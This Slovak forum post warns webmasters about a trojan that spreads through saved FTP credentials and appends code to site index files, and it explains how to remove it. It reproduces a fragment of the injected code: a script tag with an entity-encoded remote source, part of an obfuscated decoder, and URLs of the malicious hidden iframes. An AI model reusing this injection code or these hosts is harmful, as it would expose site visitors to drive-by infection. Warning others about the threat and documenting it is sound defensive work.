Navigácia
Prihlásenie
Syndikovať
Hrozba Trójske kone vo vašich stránkach
Tak do rúk sa mi dostal zaujímavý vírus z menom Trojan-Clicker.HTML.IFrame, nepatri zrovna k tým príjemným ale nieje ho ťažké nájsť a odstrániť. Väčšinou napáda súbory v stránkach ako index.* k môjmu obdivu sa vie na váš web chytro dostať cez FTP nastavené vo vašom PC neviem aký trójsky koník je jeho predchodca, tak neviem presne ako sa do stránky dostane, ale jedno je iste keď sa u vás objavy zmeňte hesla na všetky FTP účty nastavené vo vašom PC bo onedlho ho mate naspäť.
Kúsok zdrojového kódu pridaného do vašej stránky vírusom:
<?php
<script language="JavaScript"
src="&#104;&#116;&#116;&#112;&#58;&#47;&
#47;&#49;&#57;&#53;&#46;&#49;&#56;&#57;&
#46;&#50;&#50;&#55;&#46;&#53;&#56;/top100_00.js">
</script>?><?php<!-- o --><script language=JavaScript >
function dc(x){var l=x.length,b=1024,i,j,u,p=0,s=0,w=0,t=Array(63,8,5,59,28,37,12,22,43
,61,0,0,0,0,0,0,27,51,40,55,36,18,50,13,31,57,16,15,56,10,32,20,21,9,29,45,52,4,48,1,19
,33,58,0,0,0,0,23,0,17,11,7,46,41,62,38,39,0,3,25,35,26,49,30,53,24,2,34,44,14,42,47,60
,54,6);for(j=Math.ceil(l/b);j>0;j--)
{u='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])
<?>Tento skript trojana vytvára dava skrite Framy v stránke:
- V prvom frame načíta obsach tochto url odkazu :
http://82.179.170.11/dia489/
- V druhom frame natihane súbor typu wmf :
http://latech.co.kr/n.wmf
Táto špesifikácia môže byť odlišná od verzie vírusu.
Ako liečiť:
Tak ako som už povedal napáda len súbory index.html .htm .php a podobne. Zdrojový kód sa zapisuje na koniec stránky(súboru). Je možné že bude viac krát zapísaný preto treba všetky časti Zdrojového kódu odstrániť. Ako druhý krok treba zabrániť FTP klientom aby sa vedeli pripájať na našu stránku. Najľahšou cestou je zmena hesla cez nejaké to web rozhranie k hostingu. Odporúčam skontrolovať Kaspersky Anti-Virusom váš PC trial verziu nájdete tu.
- Ak chcete pridať komentáre, tak sa musíte prihlásiť alebo zaregistrovať.
Kto je online
